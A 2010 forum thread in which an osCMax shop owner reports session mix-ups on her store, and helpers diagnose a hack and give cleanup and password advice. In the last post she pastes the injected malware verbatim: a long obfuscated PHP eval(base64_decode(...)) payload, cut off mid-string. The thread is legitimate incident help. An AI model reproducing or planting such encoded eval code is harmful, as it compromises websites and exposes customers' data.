Time Out! Forcing people to log in!



michelle
02-02-2010, 07:07 AM
Hi Guys!

My website has been working fine for ages, suddenly people started seeing what was in other peoples baskets, and other peoples details!
At this point I only had Prevent Spider Sessions set to True under Configuration > Sessions. Everything else was false.

The following settings now apply:
Check SSL Session ID > true
Check User Agent > true
Check IP Address > true
Prevent Spider Sessions > true
Recreate Session > true

BUT even though people can't see other peoples details now, if you are looking at a product for 10 seconds or more it takes you to the log in page, or if you are logged in, logs you out and takes you to the log in page!

Please help! Thanks Michelle x

michael_s
02-02-2010, 08:12 AM
Sounds like you have some serious problems. You may want to check to see that your site was not hacked. If you are using an older version of osCommerce, it is very likely that your site has been hacked.

See this for security best practices:
http://wiki.oscdox.com/setting_up_security

michelle
02-02-2010, 08:36 AM
ok, thanks for your reply. will look over this link.

Can I upgrade to recent version of OSCMAX?
Is this a complicated process? I don't want to lose what I've done to my site. As far as extra add-ons etc. go, I haven't added any, as I'm not that experienced with advanced coding; it's mainly design changes and layout changes, as I'm a graphic designer!

If I upgraded would this solve some of the security issues?

thanks

Michelle

pgmarshall
02-02-2010, 10:42 AM
Which version are you running at the moment?

The templating system should allow you to move all of your work fairly painlessly to the new version (assuming you haven't done many coding changes)

Do you have an URL for your site ...

Regards,

michelle
02-02-2010, 10:58 AM
Hi,
Thanks for your post, it's Birdy's Boutique (http://www.birdys-boutique.co.uk/)

I'm not sure why all these problems started occurring!

any help would be great, thanks

Michelle

pgmarshall
02-02-2010, 11:27 AM
My website has been working fine for ages, suddenly people started seeing what was in other peoples baskets, and other peoples details!

This sort of behaviour tends to mean that you may have been hacked! Don't panic! I am sure that we will be able to get you back to normal if you have ...

Have you checked your files to see if anyone has edited any of them recently (i.e. not you!)?

Have you changed your password recently? I mean all of them ... FTP, Admin, Web Provider, etc.

Regards,

michelle
02-02-2010, 11:37 AM
that's a relief... i was starting to panic!

Well, I'm not sure which files to check. I'm not brilliant at coding; I'm not sure I'd know what I was looking for, or if they were wrong.

I haven't changed my password recently either. Should I?

Up until the last few weeks I've been really promoting the site, so it's only recently I've had a lot of people going on and registering/buying.

Thanks

Michelle

pgmarshall
02-02-2010, 12:09 PM
You need to make sure that you change your passwords frequently! And you need to make sure they are difficult ones too ... I don't want to hear that your password is Birdy1 or anything like that! Letters and numbers ...

Now, it is not worth changing all these passwords if someone already has access to your site, so you will need to have a look and see if any of your files have been changed recently. Use an FTP program to look through the latest save dates, or ask your host to have a look for you.

You also need to move your admin folder as this is a common way for people to find the files they need to hack your site. The Wiki page I wrote should guide you through this.

Otherwise, if this all sounds too awful to comprehend - it might be worth messaging RidexBuilder on this forum who I know does work for people who are less technically minded (based in scotland).

It may well be that your site is fine, but anyone who says "things started happening on their own" invariably ends up finding that hackers have been at play.

Edit: Also, you are posting in the osCommerce forum, not the osCMax forum ... I am sure a nice moderator will move this post for you ...

Regards,

michelle
02-02-2010, 12:39 PM
hello, i found out the problem...i have been hacked with this:

eval(base64_decode("JGs9MTI0OyRtPWV etc etc lots of letters and numbers...

I feel violated! Some people have said to remove this from the PHP files.

I don't feel confident enough to delete all my files and reload and I don't think my backup is very recent! ): I have the time to go through the files, but is just deleting this string enough?

thanks!
Michelle

pgmarshall
02-02-2010, 12:57 PM
Okay ... at least you now know what the problem is. base64 is a common hack ... there is more info on the Wiki here. (http://wiki.oscdox.com/setting_up_security#the_eval_base64_hack)

First things first ...

You need to remove all this extra code from your store ... it can get into every file ... so do you have a backup of your site from before this started?

You are currently running version 2.0RC3 (I think!) which is quite old and there have been a number of security fixes since this happened.

Have you changed much of your store coding or is it nearly all graphical changes to the templates? If so, it may be best to take this opportunity to upgrade your store to the latest version rather than patch the security holes.

Check your PC for keyloggers or trojans using some anti-spyware software ... details in the Wiki.

Once you have removed the code you need to change ALL your passwords and I mean ALL of them ...

Then you should be back on the straight and narrow ... but you will need to apply the security updates ... hence my comments about upgrading to osCMax 2.0.4 ... Otherwise, they will be straight back in ...

Looking at your site you appear to be using PayPal? Are they doing the payment processing for you? I.e. you don't collect credit card numbers ... If so, your customers' bank details should be safe ...

Overall, you need to remember you are not alone, almost every eCommerce store on the web, irrespective of the platform gets hacked. Too many people out there with nothing better to do!

Regards,

pgmarshall
02-02-2010, 01:06 PM
Also - just been browsing your site to see how many products you have and how long it might take to rebuild on a new platform, and it set off my virus scanner ... there is an iFrame virus lurking in there somewhere ...

Regards,

michelle
02-02-2010, 01:11 PM
It says to use a decoder to find out where the files are infected... but i'm not getting any text appear when i use it!

<?php /**/ eval(base64_decode("JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsyNjs5Oz E4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0 OzkxOzE5OzMwOzM1OzE1Ozg7Mjk7MTQ7ODs5MTs4NTs5MDs5MD s5MzsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzU5OzQ4OzUxOzYyOzYx OzQ4OzQ3OzM5OzkxOzE3OzE0OzM1OzE4OzE5OzkxOzMzOzg1Oz g1Ozc7OTI7OTI7OTI7ODg7NTk7NDg7NTE7NjI7NjE7NDg7NDc7 Mzk7OTE7MTc7MTQ7MzU7MTg7MTk7OTE7MzM7NjU7Nzc7NzE7OT I7OTI7OTI7MjE7MjY7ODQ7OTM7MjY7OTsxODszMTs4OzIxOzE5 OzE4OzM1OzI1OzQ7MjE7MTU7ODsxNTs4NDs5MTsxNzsxNDsxOT szMDsyMDs5MTs4NTs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzIx OzI2Ozg0OzkzOzI2Ozk7MTg7MzE7ODsyMTsxOTsxODszNTsyNT s0OzIxOzE1Ozg7MTU7ODQ7OTE7Mjc7MTc7MTY7OTE7ODU7ODU7 Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MT g7OTI7Mjc7MTc7MTY7ODQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5 MjsyMTsyNjs5Mjs4NDsxNTs4OzE0OzIxOzE1Ozg7MTQ7ODQ7OD g7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NTI7NDA7NDA7 NDQ7MzU7NDE7NDc7NTc7NDY7MzU7NjE7NTk7NTc7NTA7NDA7OT Q7MzM7ODA7OTQ7Mjc7MTk7MTk7Mjc7MTY7MjU7MzA7MTk7ODs5 NDs4NTswOzA7MTU7ODsxNDsyMTsxNTs4OzE0Ozg0Ozg4OzM1Oz Q3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1 OzQxOzQ3OzU3OzQ2OzM1OzYxOzU5OzU3OzUwOzQwOzk0OzMzOz gwOzk0OzU7Mjk7MjA7MTk7MTk7OTQ7ODU7ODU7Nzs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDs4NDsxNzsyNDs3Mz s4NDs4ODszNTs0Njs1Nzs0NTs0MTs1Nzs0Nzs0MDszOTs5NDsx NzsxNzsxNzsyOTsyMzsxOTsxMTsxOTsyMTsxMTsxOTsxMTs3Nj s3Njs3ODs5NDszMzs4NTs2NTs2NTs5NDsyOTs3OTs2OTs3OTs3 MjsyNDszMDsyNTs3ODs3NjszMDs3NjszMDs3OTsyNTs2OTszMD szMDsyNTs3NTsyOTs2OTsyNTsyNjszMTszMTs3NDs3Mzs3ODs3 NDsyNjs3Mjs5NDs4NTs5MDs5MDs4NDsyMTsxNTsxNTsyNTs4Oz g0Ozg4OzM1OzQ2OzU3OzQ1OzQxOzU3OzQ3OzQwOzM5Ozk0OzE3 OzE3OzE3OzI5OzIzOzE5OzExOzE5OzIxOzExOzE5OzExOzc2Oz c2Ozc3Ozk0OzMzOzg1Ozg1Ozg1Ozc7ODg7NDY7Njg7NzU7Nzg7 NzM7NzY7Nzg7Njk7NTc7NjE7Njg7Njk7NzU7Nzc7Nzg7NTc7NT c7NTY7Njg7NzQ7NzU7NzY7NjI7NjE7NTc7NzQ7NzI7NTY7Nzk7 NzY7NTc7NzI7NzU7NjU7MzA7Mjk7MTU7MjU7NzQ7NzI7MzU7Mj Q7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7MzU7NDY7NTc7NDU7NDE7 NTc7NDc7NDA7Mzk7OTQ7MTc7MTc7MTc7Mjk7MjM7MTk7MTE7MT k7MjE7MTE7MTk7MTE7NzY7NzY7Nzc7OTQ7MzM7ODU7NzE7MTQ7 
MjU7ODs5OzE0OzE4OzkyOzk0OzU3OzQ7MjU7MzE7OTs4OzIxOz E5OzE4OzgyOzgyOzgyOzg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4 OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Oz c0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOzU2Ozc5Ozc2OzU3Ozcy Ozc1OzMyOzE4Ozk0OzgyOzI1OzEwOzI5OzE2Ozg0Ozg4OzQ2Oz Y4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3 Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0Oz cyOzU2Ozc5Ozc2OzU3OzcyOzc1Ozg1OzcxOzE7OTI7OTI7OTI7 OTI7OTI7OTI7OTI7ODg7NDY7NjE7NTg7NzQ7Nzk7NTc7NjE7Nj E7NzU7NjE7Nzg7NTY7Nzc7NzM7NjM7NjE7NzM7Njk7NjE7NjI7 NjI7Njk7NzM7NjI7NzQ7NTg7NTY7Nzc7NjE7NTg7NTc7NjI7NT g7NjU7OTQ7MjA7ODs4OzEyOzcwOzgzOzgzOzk0OzgyOzMwOzI5 OzE1OzI1Ozc0OzcyOzM1OzI0OzI1OzMxOzE5OzI0OzI1Ozg0Oz k0OzM3Ozc4OzY5OzE1OzM3OzE4OzE2OzIwOzI0OzU5OzY5Ozk7 MjQ7NTk7NTg7NTsyOTs0Mzs2ODs5OzM3Ozc4OzY5Ozg7OTQ7OD U7ODI7OTQ7ODM7MTY7MjE7MTg7MjM7MTU7ODM7OTQ7ODI7MTQ7 Mjk7MTg7MjQ7ODQ7NzY7ODA7Nzg7NzM7NzY7ODU7ODI7OTQ7OD I7ODs0Ozg7Njc7MjE7MTI7NjU7OTQ7ODI7ODg7MzU7NDc7NTc7 NDY7NDI7NTc7NDY7Mzk7OTQ7NDY7NTc7NDk7NTE7NDA7NTc7Mz U7NjE7NTY7NTY7NDY7OTQ7MzM7ODI7OTQ7OTA7MjA7MTk7MTU7 ODs2NTs5NDs4MjsxNDsyOTsxMTs5OzE0OzE2OzI1OzE4OzMxOz E5OzI0OzI1Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5 Ozk0OzUyOzQwOzQwOzQ0OzM1OzUyOzUxOzQ3OzQwOzk0OzMzOz g1OzgyOzk0OzkwOzI5OzI3OzI1OzE4Ozg7NjU7OTQ7ODI7MTQ7 Mjk7MTE7OTsxNDsxNjsyNTsxODszMTsxOTsyNDsyNTs4NDs4OD szNTs0Nzs1Nzs0Njs0Mjs1Nzs0NjszOTs5NDs1Mjs0MDs0MDs0 NDszNTs0MTs0Nzs1Nzs0NjszNTs2MTs1OTs1Nzs1MDs0MDs5ND szMzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1 ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3ND s2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2 MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs5NDs5NDs3MTs5Mjs5Mj s5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsyNjs5OzE4OzMx Ozg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0Ozk0Oz MxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs5NDs4NTs4NTs5Mjs3 OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc1OzU2Oz U4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4 Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOz c4OzYxOzY4Ozc1OzcyOzkyOzY1OzkyOzYwOzMxOzk7MTQ7MTY7 MzU7MjE7MTg7MjE7ODs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mj 
s5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7 MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Nj s3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3 NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mj s4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MTs0Njs0 ODs4MDs5Mjs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NT s2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2 OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NT s3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0 OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NT s1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2 Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mz s2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1 MTs0NDs0MDszNTs0Njs1Nzs0MDs0MTs0Njs1MDs0MDs0Njs2MT s1MDs0Nzs1ODs1Nzs0Njs4MDs5Mjs3Nzs4NTs3MTs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1Oz I1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2 ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mj s3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2 ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNT s0MDs1Mzs0OTs1Nzs1MTs0MTs0MDs4MDs5Mjs3Nzs3Mzs4NTs3 MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0Oz E2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1 Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mz s1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2 Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MT s0NDs0MDszNTs1Nzs1MDs2Mzs1MTs1Njs1Mzs1MDs1OTs5Mjs4 MDs5Mjs5NDsyNzs2OzIxOzEyOzk0Ozg1OzcxOzkyOzkyOzkyOz kyOzkyOzkyOzkyOzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4 OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5Oz YyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0 Ozc1OzY1OzYwOzMxOzk7MTQ7MTY7MzU7MjU7NDsyNTszMTs5Mj s4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3 NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MT s3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4NTs3MTs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2Oz M1OzMxOzE2OzE5OzE1OzI1OzkyOzg0Ozg4OzQ2Ozc1OzU2OzU4 OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Oz c1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4 
OzYxOzY4Ozc1OzcyOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOz kyOzE7OTI7MjU7MTY7MTU7MjU7OTI7Nzs5Mjs5Mjs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OT s3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2 Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NT s2NTs2MDsyNjsyMTsxNjsyNTszNTsyNzsyNTs4OzM1OzMxOzE5 OzE4Ozg7MjU7MTg7ODsxNTs4NDs4ODs0Njs2MTs1ODs3NDs3OT s1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2 OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1OD s1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjsx OzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OT I7MTQ7MjU7ODs5OzE0OzE4OzkyOzg4OzQ2OzU4OzcyOzY4OzYy OzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOz Y4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2 OzU3Ozc0Ozc1OzcxOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OT I7OTI7MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4 NDs5MzsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMT sxNTs4OzE1Ozg0OzkxOzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7 OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOz g7MjE7MTk7MTg7OTI7Mjc7NjsyNDsyNTszMTsxOTsyNDsyNTs4 NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NT s3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3 Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4NTs3OzkyOz kyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc5Ozc2OzYyOzc4OzYxOzYy OzY4OzU2OzYzOzc3OzcyOzY5Ozc0OzU2Ozc2Ozc0OzYyOzc4Oz c5Ozc2OzYxOzc1Ozc3OzU2OzY4OzY5Ozc0Ozc4OzYxOzU4Ozcz OzU2OzY1OzYwOzE5OzE0OzI0Ozg0OzYwOzE1Ozk7MzA7MTU7OD sxNDs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2 OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1OD s3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4MDs3 OTs4MDs3Nzs4NTs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4OD s0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3 OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2OD s3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs3Nzs3Njs3MTs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2MTs3OTs1Njs3Mzs3OD s1Nzs3Mzs3ODs2MTs3Mjs2ODs2OTs3OTs3NDs2Mzs1Njs1Nzs3 Njs1ODs3Mzs3OTs3Mzs3NDs2Mjs2Mjs3Njs2ODs3NDs3Mzs3OD s1ODs3ODs2NTs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsy Njs4NDs4ODs0Njs3OTs3Njs2Mjs3ODs2MTs2Mjs2ODs1Njs2Mz 
s3Nzs3Mjs2OTs3NDs1Njs3Njs3NDs2Mjs3ODs3OTs3Njs2MTs3 NTs3Nzs1Njs2ODs2OTs3NDs3ODs2MTs1ODs3Mzs1Njs5MDs3Mj s4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5 OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2Oz cyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3 OzU3Ozc4OzY5OzU3OzYyOzY1OzYwOzk7MTg7MTI7Mjk7MzE7Mj M7ODQ7OTE7MTA7OTE7ODA7MTU7OTszMDsxNTs4OzE0Ozg0Ozg4 OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOz c2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3 OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzc3Ozc2OzgwOz c4Ozg1Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2 Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Oz c0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2 OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1Ozg4OzQ2Ozc0Ozc5Oz YyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2Ozcy OzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3Oz U3Ozc4OzY5OzU3OzYyOzM5Ozc3OzMzOzcxOzkyOzkyOzkyOzky OzkyOzkyOzkyOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Oz c5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4 Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Oz g3OzY1Ozc4Ozg3Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0 OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOz U2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYy OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OT I7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7 Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nz k7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7 NTY7OTA7Njg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4OD s0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3 OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2OD s3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0 OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3Oz YyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYz OzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOz YzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3 OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Oz c4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzcz Ozc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOz kyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7 
ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7Nz I7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7 NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzc7NzQ7OD U7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3 Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3OD s3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3 OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Oz g0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1 OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Oz c3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIw OzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOz U2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0 OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOz U2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7 OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7Nz Y7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7 NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7Nz Q7Nzg7NjE7NTg7NzM7NTY7OTA7Nzg7ODU7Nzs5Mjs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Nj s3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2 ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OT s4Nzs2NTs3ODs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzky OzkyOzkyOzkyOzkyOzg4OzQ2Ozc2Ozc5OzcyOzYxOzU3Ozc4Oz YxOzYyOzY5OzcyOzU4OzY5OzY5OzYzOzYzOzY4Ozc3OzYyOzc5 OzY4OzY5OzYxOzc3OzY4Ozc4Ozc4OzU2OzYxOzc5Ozc5OzczOz c5OzY1OzYwOzI3OzY7MjE7MTg7MjY7MTY7Mjk7ODsyNTs4NDs2 MDsxNTs5OzMwOzE1Ozg7MTQ7ODQ7ODg7NDY7NzM7NjE7Njk7Nj M7NTg7Nzc7NjI7NzI7Njk7NzU7NzM7NzY7Nzg7NjE7NjM7NjE7 Nzg7Nzk7NjM7Njg7NTg7NzQ7Nzc7Nzc7NjE7NzM7NzQ7NzI7Nz Q7Njg7NzI7NjM7ODA7ODg7NDY7NjI7NTc7NzI7NjM7NzI7NTY7 NzY7Nzk7NzU7NTc7Njk7Nzk7Njk7Nzg7Nzg7NzQ7NTg7NzQ7Nz M7Njg7Nzc7Nzg7Njg7Njg7NzM7NjE7NzM7Nzk7NTY7NjE7NTY7 Njk7ODU7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7OD Q7ODg7NDY7NzY7Nzk7NzI7NjE7NTc7Nzg7NjE7NjI7Njk7NzI7 NTg7Njk7Njk7NjM7NjM7Njg7Nzc7NjI7Nzk7Njg7Njk7NjE7Nz c7Njg7Nzg7Nzg7NTY7NjE7Nzk7Nzk7NzM7Nzk7NjU7NjU7NjU7 NTg7NjE7NDg7NDc7NTc7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mj s5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3 Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MT 
